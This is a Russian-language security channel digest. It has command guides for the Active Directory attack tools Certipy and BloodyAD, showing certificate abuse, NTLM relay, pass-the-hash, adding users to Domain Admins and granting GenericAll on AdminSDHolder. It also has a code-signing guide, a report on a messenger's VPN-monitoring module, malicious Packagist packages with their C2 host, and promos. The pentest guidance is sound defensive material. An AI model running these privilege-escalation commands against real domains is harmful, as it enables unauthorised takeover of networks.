Certipy: Инструмент для аудита и эксплуатации служб сертификации Active Directory

Certipy — инструмент для перечисления, анализа и эксплуатации уязвимостей служб сертификации Active Directory (AD CS). Разработан для профессионального тестирования на проникновение и защиты инфраструктур, поддерживает полный спектр известных атак (ESC1–ESC16) и предоставляет возможности для обнаружения, запроса, подделки сертификатов и ретрансляции аутентификации.

🎇Certipy предназначен как для наступательных, так и для защитных задач, связанных с Active Directory Certificate Services. Инструмент обеспечивает комплексный подход к оценке безопасности PKI-инфраструктуры Windows. Функции:
▶️поиск центров сертификации (CA) и шаблонов сертификатов
▶️автоматическое выявление misconfigurations (ESC1–ESC16)
▶️создание сертификатов с заданными атрибутами
▶️использование сертификатов для получения доступа
▶️перехват и перенаправление NTLM-аутентификации на HTTP(S)/RPC-эндпоинты AD CS

⬇️Установка

pipx install certipy-ad

Проверка

certipy-ad -h

⏺️Перечисление AD CS (find)

certipy-ad find -u user@domain.local -p 'Password123!' -dc-ip 192.168.1.10

⏺️Сохранение результатов (флаг -output)

certipy-ad find -u user@domain.local -p 'Password123!' -dc-ip 192.168.1.10 -output results

⏺️Поиск уязвимостей (флаг -vulnerable)

certipy-ad find -u user@domain.local -p 'Password123!' -dc-ip 192.168.1.10 -vulnerable

⏺️Запрос сертификата (req)

certipy-ad req -u user@domain.local -p 'Password123!' -ca 'CA-SERVER' -template 'User'

⏺️Аутентификация по сертификату (auth)

certipy-ad auth -pfx user.pfx -dc-ip 192.168.1.10

⏺️Управление сертификатами (cert)

certipy-ad cert -pfx user.pfx -password 'Password123!' -export

⏺️Shadow Credentials атака (shadow)

certipy-ad shadow -u user@domain.local -p 'Password123!' -target 'computer$' -dc-ip 192.168.1.10

⏺️Ретрансляция NTLM (relay)

certipy-ad relay -ca 192.168.1.10 -template 'DomainController'

⏺️Справка по конкретной команде

certipy-ad find -h

👉Ограничения
- для эксплуатации многих уязвимостей требуются базовые права доменного пользователя
- необходим доступ к LDAP (389/636), RPC (135/445) и HTTP(S) (80/443) портам CA
- зависимости (impacket, ldap3, pyopenssl, asn1crypto и другие библиотеки)

#ActiveDirectory #AD #LDAP #Certipy #tool #pentest #ADCS

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

🛡Кибер Трукрайм. Когда эпидемия грянула в одночасье и все хотят плакать

Представьте беговую дорожку.
На финише — вирус, который может уронить мировую инфраструктуру: банки, больницы, заводы, логистику.

На старте сразу несколько игроков:
🟢Microsoft с уязвимостью, из-за которой всё началось
🟢злоумышленники
🟢лучшие специалисты по кибербезопасности
🟢и безымянный хакер в засаленном худи

WannaCry: Кто добежит первым? Мир уйдёт в темноту или успеют остановить цепную реакцию? И да: это только первая глава истории.

Это спецсезон «Кибер Трукрайм» с разбором самых громких и сложных кейсов в кибербезопасности. Сегодняшний выпуск про ситуацию, где ставки были максимальные, спасение — почти случайность, а зачем всё затевали — до сих пор неясно. Версий много. Не хватает разве что инопланетян.

Эксперты выпуска:
— Дмитрий Галов, руководитель Kaspersky GReAT в России и СНГ
— Борис Ларин, ведущий исследователь Kaspersky GReAT

Слушать можно на Яндекс.Музыке, Apple Podcast или на другой удобной вам платформе.

BloodyAD: Фреймворк для повышения привилегий в Active Directory

BloodyAD — инструмент, выполняющий специализированные LDAP-запросы к контроллеру домена. Поддерживает аутентификацию с использованием паролей в открытом виде, Pass-the-Hash, Pass-the-Ticket и сертификатов, обеспечивая гибкие возможности для тестирования безопасности AD-инфраструктур.

👉BloodyAD предоставляет возможность выполнять привилегированные операции через LDAP-протокол. Инструмент отличается следующими характеристиками:
▶️множество методов аутентификации (NTLM (пароль/хеш), Kerberos, сертификаты (Schannel, PKINIT))
▶️прозрачная работа через SOCKS-прокси
▶️поддержка LDAPS и шифрования
▶️интеграция с DNS-функциями Active Directory
▶️гибкая система команд для управления объектами AD

⬇️Установка

pipx install bloodyad

Проверка

bloodyad -h

⏺️Аутентификация с паролем (NTLM)

bloodyAD --host 192.168.1.10 -d bloody.local -u john.doe -p 'Password123!' get object user john.doe

⏺️Pass-the-Hash аутентификация

bloodyAD --host dc01.corp.local -d corp.local -u administrator -p :70016778cb0524c799ac25b439bd6a31 get group "Domain Admins"

⏺️Смена пароля пользователя

bloodyAD --host 172.16.1.15 -d bloody.local -u admin -p 'Admin123!' set password john.doe 'NewP@ssw0rd!'

⏺️Получение информации о пользователе

bloodyAD --host dc.corp.local -d corp.local -u user -p 'Password' get object user administrator --json

⏺️Добавление пользователя в группу

bloodyAD --host dc.corp.local -d corp.local -u admin -p 'Admin123!' add groupmember "Domain Admins" john.doe

⏺️Удаление пользователя из группы

bloodyAD --host dc.corp.local -d corp.local -u admin -p 'Admin123!' remove groupmember "Domain Admins" john.doe

⏺️Shadow Credentials (атака на основе сертификатов)

#добавление теневых учетных данных для пользователя
bloodyAD --host dc.corp.local -d corp.local -u admin -p 'Admin123!' add shadowCredentials john.doe

#получение хеша из теневых учетных данных
bloodyAD --host dc.corp.local -d corp.local -u admin -p 'Admin123!' get shadowCredentials john.doe

⏺️Изменение атрибутов безопасности

#добавление GenericAll права для пользователя на объект
bloodyAD --host dc.corp.local -d corp.local -u admin -p 'Admin123!' set genericall john.doe "CN=AdminSDHolder,CN=System,DC=corp,DC=local"

⏺️Поиск объектов с заданными атрибутами

bloodyAD --host dc.corp.local -d corp.local -u user -p 'Password' get search "(&(objectClass=user)(adminCount=1))"

⏺️Получение всех пользователей с непередаваемыми учетными записями

bloodyAD --host dc.corp.local -d corp.local -u user -p 'Password' get search "(userAccountControl:1.2.840.113556.1.4.803:=8192)"

🎇Ограничения и требования
- Для выполнения привилегированных операций требуются соответствующие права в AD
- Необходим доступ к портам LDAP (389/636) и, при необходимости, к Kerberos (88)
- Поддерживаются современные версии Python 3
- Кроссплатформенный инструмент (Windows, Linux, macOS)

#ActiveDirectory #AD #LDAP #BloodyAD #tool #pentest

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

Как на самом деле работает режим инкогнито и гарантирует ли он приватность?

В новой статье рассказываем, почему приватный режим — это не анонимность.

Разбираем, почему режим инкогнито не делает вас невидимкой:
⏺️Кто на самом деле видит ваши запросы
⏺️Что такое фингерпринтинг и почему куки тут ни при чем
⏺️Как вас находят, даже если вы чистите историю

Также в статье:
➡️Как обеспечивать максимальную анонимность в сети, если это действительно необходимо
➡️А также рассмотрим сценарии, когда режим инкогнито может быть полезен

Читайте подробнее!

#анонимность #приватность #браузер

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

MAX следит за пользователями VPN?

🎇Пользователь runetfreedom на ресурсе Habr провел реверс-инжиниринг клиента российского мессенджера MAX (версия 26.4.3) и подтвердил, что приложение содержит модуль для слежки за использованием VPN и доступностью заблокированных ресурсов.

В ходе анализа трафика через mitmproxy и декомпиляции APK было установлено следующее:
1️⃣Приложение использует бинарный протокол (заголовок 10 байт + данные в формате MessagePack), который сложно декодировать стандартными средствами. Трафик замешивается с основными данными мессенджера, что делает невозможной его блокировку без отключения самого MAX.
2️⃣При сворачивании или разворачивании приложения на серверы api.oneme.ru уходит пакет со следующим содержимым:
- Список целей (main.telegram.org, mmg.whatsapp.net, gosuslugi.ru, gstatic.com, mtalk.google.com и другие)
- Результаты проверки (доступность хостов по ICMP (ping) и TCP-порту 443 (HTTPS). Это позволяет определить, заблокирован ли ресурс на уровне ТСПУ)
- IP-адрес устройства (запросы к списку сервисов (как российских, так и зарубежных) для определения реального IP)
- Статус VPN (флаг, показывающий, активно ли VPN-подключение на устройстве (через нативный Android API))
- Данные оператора (PLMN-код (MCC + MNC), позволяющий определить страну и оператора связи)
3️⃣Модуль включается и отключается сервером удаленно. При логине или обновлении сессии приходит конфигурация с флагом host-reachability, что позволяет активировать слежку точечно — для конкретных аккаунтов или групп.

🔎Выводы из исследования
▶️Модуль был разработан намеренно, это не случайный аналитический SDK
▶️ Методология проверки (ping + TCP:443) напрямую указывает на цель — мониторинг эффективности блокировок
▶️ Смешивание шпионского трафика с основным делает невозможным его отсечение без отключения всего мессенджера
▶️Сбор IP через микс российских и зарубежных сервисов помогает выявлять пользователей, которые не заворачивают весь трафик в VPN
▶️Возможность дистанционного включения функции для отдельных пользователей превращает приложение в инструмент тотальной слежки

❗️Автор исследования рекомендует:
▶️Удалить приложение
▶️Если удалить невозможно — установить его в изолированное рабочее пространство (Samsung Knox, Второе пространство на Xiaomi, Shelter на чистых Android). Такие среды обычно не наследуют VPN основного профиля
▶️Заблокировать на файерволе сервисы определения IP, которые использует приложение
▶️Рассказать другим — даже если пользователю нечего скрывать, такие инструменты лишают доступа к части интернета и бытового комфорта

❗️Официальный ответ MAX
В пресс-службе MAX заявили Habr, что приложение не отправляет запросы на серверы WhatsApp* и Telegram. Разработчики опубликовали детальные пояснения:
1️⃣IP-адреса нужны только для звонков (технология WebRTC требует внешний IP для построения прямого P2P-маршрута «телефон-телефон». Это стандарт для всех сервисов с подобными звонками)
2️⃣Запросы к Apple и Google необходимы для проверки доставки push-уведомлений в сложных сетевых условиях и при ограничениях связи в регионах
3️⃣MAX не отправляет запросы на серверы WhatsApp* и Telegram

В компании подчеркнули: решения направлены исключительно на качество звонков и уведомлений. К персональным данным, VPN и другим сервисам они не имеют отношения.

✉️Официальные пояснения не объясняют факты, вскрытые реверс-инжинирингом:
▶️Зачем для звонков проверять gosuslugi.ru и другие сторонние сайты?
▶️Почему кроме TCP:443 проверяется ICMP (ping) — классический метод тестирования блокировок в обход ТСПУ?
▶️Зачем безобидную информацию передавать в закрытом бинарном протоколе, замешивая с основным трафиком?
▶️Почему модуль управляется удаленно через серверный флаг host-reachability, включаясь точечно для отдельных аккаунтов?

Ответ разработчиков не закрывает эти вопросы. Выводы каждый делает сам.

*Принадлежит Meta, признанной экстремистской и запрещенной в РФ

#MAX #news #VPN #Habr

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

OSSLSignCode: Инструмент для подписи кода и проверки цифровых подписей

OSSLSignCode — утилита с открытым исходным кодом для подписи исполняемых файлов и проверки цифровых подписей с использованием криптографических библиотек OpenSSL. Инструмент предназначен для создания, добавления, извлечения и верификации подписей в форматах Authenticode (PE, MSI, CAB) и других, поддерживая гибкую настройку параметров подписи и работу с различными типами сертификатов.

↗️OSSLSignCode предоставляет функциональность, аналогичную стандартной утилите signtool из Windows SDK, но с открытым исходным кодом и поддержкой различных платформ. Инструмент позволяет:
▶️создание цифровых подписей для PE-файлов (.exe, .dll), MSI-пакетов, CAB-архивов
▶️получение встроенных подписей из подписанных файлов
▶️очистку файлов от существующих цифровых подписей
▶️верификацию целостности и подлинности подписанных файлов
▶️добавление timestamp от доверенных служб

⬇️Установка

sudo apt install osslsigncode

Проверка

osslsigncode -h

⏺️Базовая подпись исполняемого файла с описанием и временной меткой

osslsigncode sign \
  -pkcs12 code_signing_cert.p12 \
  -pass secure_password \
  -n "Application Name" \
  -i https://company.com \
  -t http://timestamp.digicert.com \
  -h sha256 \
  -in app.exe \
  -out app_signed.exe

Подписание файла с указанием описания, URL компании, добавлением доверенной временной метки и использованием современного хеш-алгоритма SHA256.

⏺️Подпись MSI-инсталлятора

osslsigncode sign \
  -pkcs12 cert.p12 \
  -pass password \
  -add-msi-dse \
  -t http://timestamp.digicert.com \
  -in installer.msi \
  -out installer_signed.msi

Специализированная подпись для MSI-пакетов с обязательным флагом -add-msi-dse, обеспечивающим корректную работу цифровой подписи.

⏺️Проверка подписи с полной валидацией цепочки сертификатов

osslsigncode verify \
  -in app_signed.exe \
  -CAfile trusted_roots.pem \
  -CRLfile crl.pem \
  -verbose \
  -require-leaf-hash sha256:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Комплексная проверка подписи, включающая валидацию по доверенным корневым сертификатам, проверку списков отзыва (CRL) и требование конкретного хеша листового сертификата для исключения подмены.

⏺️Извлечение подписи для анализа

osslsigncode extract-signature -pem -in app_signed.exe -out signature.pem

Извлечение встроенной подписи в PEM-формате для последующего анализа структуры PKCS#7, проверки сертификатов или интеграции с другими криптографическими инструментами.

⏺️Добавление временной метки к уже подписанному файлу

osslsigncode add \
  -t http://timestamp.sectigo.com \
  -in app_signed.exe \
  -out app_with_timestamp.exe

Обновление существующей подписи путем добавления актуальной временной метки без повторного подписания, что продлевает срок доверия к подписи после истечения сертификата.

🎇Ограничения и требования
- Требует установленной OpenSSL (версии 1.1.1 или 3.x)
- Поддерживаются PE, MSI, CAB
- Требуются действительные сертификаты подписи кода
- Для установки могут потребоваться права администратора

#OSSLSignCode #OpenSSL #tool #pentest #PKCS12 #MSI

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

🎇 В Packagist обнаружены вредоносные Laravel-пакеты, распространяющие RAT для Windows, macOS и Linux

Исследователи обнаружили вредоносные PHP-пакеты в репозитории Packagist, которые маскируются под вспомогательные библиотеки для Laravel. На самом деле они устанавливают кроссплатформенный троян удалённого доступа (RAT), способный работать на Windows, macOS и Linux.

Атака относится к классу supply chain attacks — злоумышленники распространяют вредоносный код через зависимости, которые разработчики устанавливают в свои проекты.

❗️ Вредоносные пакеты
Специалисты обнаружили следующие подозрительные пакеты:
▶️nhattuanbl/lara-helper
▶️nhattuanbl/simple-queue
▶️nhattuanbl/lara-swagger

Количество загрузок у них было небольшим, однако они всё равно представляют серьёзную угрозу для разработчиков и серверов, где используются.

Особенность атаки в том, что пакет lara-swagger не содержит вредоносный код напрямую — вместо этого он добавляет зависимость lara-helper, которая уже устанавливает RAT. Такой подход усложняет обнаружение угрозы.


❓Как работает вредоносный код
🔔 В пакетах lara-helper и simple-queue исследователи нашли PHP-файл:

src/helper.php

🔔 Вредоносный код использует несколько техник, чтобы затруднить анализ:
⏺️обфускацию потока управления
⏺️кодирование доменных имён
⏺️скрытие команд и путей
⏺️рандомизацию имён функций и переменных

Это значительно усложняет статический анализ и поиск вредоносной логики.

🕸 Подключение к серверу управления (C2)

После загрузки вредоносный код устанавливает соединение с сервером управления:
helper.leuleu[.]net:2096

Далее заражённая система отправляет информацию о системе и начинает ждать команды оператора. Это фактически даёт злоумышленнику полный удалённый доступ к машине.

Связь происходит по TCP через PHP-функцию:
stream_socket_client()

Благодаря этому вредоносный код остаётся работоспособным даже в средах с жёсткой конфигурацией безопасности PHP.

#rat #attack #laravel #windows #linux

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

Открытие весеннего сезона и новые задания на платформе HackerLab!

Сезонный рейтинг:
С сегодняшнего дня вы можете побороться за лидирующие позиции рейтинга в новом сезоне на нашей платформе. Не упустите шанс провести весенние дни с пользой, прокачать свои навыки и стать лучшим!

Призы:
🥇1 место — 2 месяца подписки PRO на HackerLab + 30% скидка на любой курс Академии Кодебай, эксклюзивный бейдж на платформе
🥈2 место — 1 месяц подписки PRO на HackerLab + 20% скидка на любой курс Академии Кодебай, эксклюзивный бейдж на платформе
🥉3 место — 1 месяц подписки PRO на HackerLab + 10% скидка на любой курс Академии Кодебай, эксклюзивный бейдж на платформе
4-10 место — 1 месяц подписки PLUS на HackerLab + 5% скидка на любой курс Академии Кодебай, эксклюзивный бейдж на платформе

📆 Сезон завершается 31 мая
——————————————
🚩 Новые задания на платформе HackerLab!

⚙️ Категория Реверс-инжиниринг — Анализатор вселенной

🌍 Категория Веб — Документальный архив

Приятного хакинга!